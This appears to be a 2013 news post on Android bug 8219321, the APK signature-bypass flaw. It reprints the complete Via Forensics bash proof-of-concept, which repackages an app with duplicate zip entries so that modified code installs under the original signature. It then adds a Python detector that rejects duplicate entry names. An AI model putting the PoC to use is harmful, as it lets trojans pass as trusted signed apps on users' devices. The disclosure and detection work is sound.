A few days ago, the company Bluebox Security announced that at the Black Hat USA 2013 conference, which begins July 27, 2013, they will present an interesting vulnerability in the security model of the Android operating system: it allows an attacker to modify the contents of an APK file without changing its cryptographic signature. In other words, a Trojan can be added to any application while the cryptographic signature of the original author's application stays intact.
The vulnerability has existed for four years, since Android 1.6, which means at least 900 million devices are affected. The bug was reported to Google in February and registered under number 8219321; it appears to have been closed in new Samsung firmware versions but remains on all other devices.
Hackers from the company Via Forensics did not wait for the conference and yesterday published PoC exploit code.
Decompiling the APK, inserting code and recompiling it can be done with the reverse-engineering tool APKTool.
The simple script published below exploits the Android vulnerability: when the archive contains two entries with the same name, the system verifies the signature of the original file but installs the updated version.
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +Info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z "$1" ]; then echo "Usage: $0 <file.apk>"; exit 1; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
# decode the APK with apktool into ./out
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
# rebuild the modified tree into out.apk (unsigned)
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
# unpack the original, signed APK next to the rebuilt one
unzip ../$APK
mv ../out.apk .
# helper: append one file to an existing zip archive, even if an entry with that name already exists
cat > poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
# append every original entry (including META-INF/ signature files) to the rebuilt archive
for f in `find . -type f | egrep -v "(poc.py|out.apk)"`; do ./poc.py out.apk "$f"; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
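As an added example that is not part of the original post or the Via Forensics PoC, here is the check a package verifier, app-store scanner or incident responder wants against this bug: list every entry name that appears more than once in an archive's central directory, read both copies independently, and refuse any package where that happens. It uses only Python's standard zipfile module; the sample archive is constructed inline (mirroring the order the PoC produces, modified entries first) and is not a real APK.

```python
#!/usr/bin/env python3
# Added example (not from the original post): detect the precondition of Android
# bug 8219321, an APK whose central directory lists one entry name twice, and show
# why two components that pick different copies of that entry disagree.
import io
import warnings
import zipfile
from collections import Counter


def duplicate_entries(z):
    """Map each entry name that occurs more than once in the central directory
    of ZipFile `z` to its ZipInfo records, in directory order."""
    infos = z.infolist()                      # every record, duplicates included
    counts = Counter(info.filename for info in infos)
    return {name: [i for i in infos if i.filename == name]
            for name, n in counts.items() if n > 1}


def conflicting_views(z):
    """For each duplicated name return (first_copy_bytes, last_copy_bytes).
    Opening by ZipInfo reads that specific record via its header offset, so
    both copies are read regardless of which one a name lookup would pick."""
    views = {}
    for name, infos in duplicate_entries(z).items():
        with z.open(infos[0]) as first, z.open(infos[-1]) as last:
            views[name] = (first.read(), last.read())
    return views


def is_clean(apk):
    """True if the package has no duplicated entry names. `apk` is a path or a
    file-like object; a scanner or installer should reject anything else."""
    with zipfile.ZipFile(apk) as z:
        return not duplicate_entries(z)


def build_sample(tamper=True):
    """Constructed sample (not a real APK): a tiny zip with 'classes.dex' stored
    twice with different contents when `tamper` is True, modified copy first."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")       # zipfile only warns on duplicate names
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr("AndroidManifest.xml", b"<manifest/>")
            if tamper:
                z.writestr("classes.dex", b"MODIFIED-DEX")
            z.writestr("classes.dex", b"ORIGINAL-DEX")
    buf.seek(0)
    return buf


def scan_sample():
    """Run the check over the tampered sample and return a summary dict."""
    with zipfile.ZipFile(build_sample()) as z:
        dups = sorted(duplicate_entries(z))
        views = conflicting_views(z)
        by_name = z.read("classes.dex")       # zipfile's name lookup keeps the last copy
    return {
        "duplicates": dups,
        "first": views["classes.dex"][0],
        "last": views["classes.dex"][1],
        "lookup_returns_last": by_name == views["classes.dex"][1],
    }


if __name__ == "__main__":
    print(scan_sample())
    print("clean sample accepted:", is_clean(build_sample(tamper=False)))
```

The point the summary makes is that two perfectly valid readers of the same archive can return different bytes for one name (here, Python's own lookup returns the last copy), so a signature check and an installer that do not share one zip parser cannot be assumed to agree; rejecting duplicate names outright removes that ambiguity.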